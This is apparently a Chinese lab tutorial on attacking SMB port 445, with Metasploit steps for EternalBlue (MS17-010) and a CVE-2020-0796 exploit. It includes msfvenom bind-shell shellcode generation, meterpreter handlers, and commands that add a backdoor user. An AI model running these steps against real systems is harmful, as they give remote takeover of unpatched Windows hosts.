漏洞利用三:445端口漏洞利用
445端口用来访问共享文件夹,445端口之所以危险,是因为厂商默认开放。
靶机:win7系统 IP:10.0.0.199 提前关闭靶机防火墙
一、MS17-010 永恒之蓝
MS微软,17年,10号漏洞。即新闻上报道的比特币勒索病毒。
1.进入MSF控制台:msfconsole
2.找到要利用的漏洞输入编号(search命令):search ms17-010
3.查看组件列表,选择要利用的攻击项(use命令):use 0
4.以为此处提示需要配置Payload,所以按照提示,Tab键一次是补全,两次是出来配置菜单。
配置攻击payload: set payload windows/x64/meterpreter/(两次tab)
(此处Payload设置为tcp的反向连接)
5.查看模块配置信息(带Yes的是需要配置的):命令:show options
查看能攻击哪些系统命令:info
需要配置的内容:本地主机IP:LHOST,攻击的靶机IP:RHOSTS。
5.配置(set命令):
set rhosts 10.0.0.199
返回上级:back
6.开始攻击(exploit命令): exploit
7.攻击成功后提示建立会话。
“?”可查看攻击项目
例:shell命令进入对方命令行。
此时可在入侵界面操作命令:如创建用户 net user 123 123 /add
同时win7靶机上显示创建用户成功。
二、CVE-2020-0796 永恒之蓝2.0
基于SMBv3的漏洞,Windows 8和Windows Server 2012-Windows 10 最新版全部中招,属于系统级漏洞利用这一漏洞会使系统遭受‘蠕虫型’攻击,这意味着很容易从一个受害者感染另一个受害者,一开机就感染。提权后可以做任意操作,例如加密你的文件勒索你。比如说像 EternalBlue 1.0(永恒之蓝 1.0)一样,加密文件,对你进行勒索虚拟货币。
1.准备
靶机:win10 IP:10.0.0.171
2.攻击
下载插件
将插件传入kali系统mnt文件夹下
在kali主机输入命令:python3 scanner.py 10.0.0.171
表示Win10中存在该漏洞。
下载另一个插件
将插件传入kali的mnt文件夹下
在kali上输入命令:python3 CVE-2020-0796.py 10.0.0.171
结果出现蓝屏
3.第三个工具
(1)msfvenom生成正向连接木马(只支持正向连接,不支持反向)
(有关msfvenom详细使用可参考https://www.jianshu.com/p/dee2b171a0a0)
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
用生成的shellcode将exploit.py中的这一部分替换掉(buf后的字符串,保留USER_PAYLOAD不变)
(2)打开kali另一个xshell界面,在msfconsole下:开启msf监听
use exploit/multi/handler
因为是反向shell,所以改为正向
set payload windows/x64/meterpreter/bind_tcp
set lport 4444 //监听端口
set rhost 10.0.0.171 //目标主机
(3)运行exploit.py脚本,反弹shell。切换回第一个xshell界面。运行第一步修改好的脚本
此时得到了shell
如执行增加用户命令:
net user 123 123 /add
此时win10增加了一个123用户(密码123)。
三、MS08-067 网络服务器攻击
同理,不再赘述。
漏洞利用三:445端口漏洞利用相关推荐
- 永恒之蓝windows7:445端口漏洞
首先我们来了解一下windows下445端口的作用,445端口是SMB服务端口. SMB是一个协议名,全称是Server Message Block(服务器消息快协议),用于在计算机间共享文件.打印机 ...
- 修复“勒索漏洞”,“想哭漏洞”,“445端口漏洞”,修复微软“KB4012212”补丁的一些办法
1.使用windows update更新功能,更新重要的补丁. 可选的补丁可以不用更新 2.单独下载微软的KB4012212补丁,其实这个补丁早在3月19日,微软就已经发布了,只是大家没有注意而已. ...
- MetaSploit攻击实例讲解------攻击445端口漏洞(kali linux 2016.2(rolling))(详细)
不多说,直接上干货! 大家,相信最近的这个事件,对于445端口已经是非常的小心了.勒索病毒 445端口是一个毁誉参半的端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也正是因为有了 ...
- Linux使用445端口,利用enum4linux 445端口+wordpress插件任意文件上传的一次渗透
探测内网80端口发现目标IP 目标使用Apache 2.4.7web服务中间件 使用linux Ubuntu系统 使用御剑扫描了目录 目录扫描到了 对192.168.31.236/wordpr ...
- 图解禁用WannaCry病毒利用的445端口
- BlackSquid恶意软件分析:利用8个臭名昭著的漏洞攻击服务器,并投放挖矿恶意软件
概述 如果说,攻击者成功利用未修复的安全漏洞实现攻击的事件,大家已经习以为常.那么,如果有攻击者使用了8个漏洞来获取企业资产数据及客户信息,那么事情就变得不一样了. 近期,我们发现了一个新型恶意软件系 ...
- 蠕虫病毒利用永恒之蓝漏洞传播 单位局域网受威胁最大
一. 概述 日前,火绒安全团队通过"火绒威胁情报系统"发现蠕虫病毒"Worm/Sharp"正在全网传播,其中在政府.企业.学校.医院等单位的局域网具有非常强的传 ...
- 永恒之蓝漏洞(开放445端口,关闭防火墙)
小白学了一点简单的永恒之蓝,做了点笔记,感觉挺详细,希望能帮助到小伙伴们,大佬勿喷哦,有不足的地方希望多多指教 实验目的 本次实验主要是利用永恒之蓝漏洞对windows7进行控制利用,掌握Metapl ...
- 常见端口漏洞利用总结
21端口渗透剖析 FTP通常用作对远程服务器进行管理,典型应用就是对web系统进行管理.一旦FTP密码泄露就直接威胁web系统安全,甚至黑客通过提权可以直接控制服务器.这里剖析渗透FTP服务器的几种方 ...
最新文章
- fatal error C1021: 无效的预处理器命令“warning”
- leetCode 50.Pow(x, n) (x的n次方) 解题思路和方法
- C#下把txt文件数据读进sql server中存储所遇到的乱码问题
- 特别慢_背什么都特别慢,该怎么提高记忆力?
- Linux学习总结(39)——系统管理员应该知道的 20 条 Linux 命令
- 20191021:(leetcode习题)乘积小于K的子数组
- 算法的定义、特征及其算法设计的要求
- 详解NRF24L01无线收发模块
- Unity下载安装及许可证获取教程
- 【一个挺蠢的小东西= =】页面展示富文本编辑器的图片的适配尺寸问题
- IN和AdaIN原理与代码实现
- python 图像对比度_Python: PS 图像调整--对比度调整
- Java进阶(七)Java加密技术之非对称加密算法RSA
- CSS3小可爱亲吻表白特效,给你的五一假期增添点小乐趣
- 实时翻译器-实时自动翻译器
- Windows 11 修改桌面文件路径
- Android 手势操作GestureDetector
- 只有程序员才懂得的梗!
- 搜狗输入法 状态栏 自带的好用工具
- 解锁Android性能优化的五大误区!面试必问
热门文章
- 使用queryset新增数据
- JavaScript-数组(new Array)
- python psycopg2_Python:使用psycopg2模块操作PostgreSQL
- java for循环创建线程_Java创建线程的两种方法
- 【NLP基础】英文关键词抽取RAKE算法
- 报告显示:被调研中国企业超85%已从数字转型中获得回报
- 芯原商业模式sipaas中第二个s指的是(芯原股份面试题)
- 状态放松方法(收集)
- python commands.getoutput_Python3中用什么替换commands模块的getstatusoutput()
- maven 项目 改名字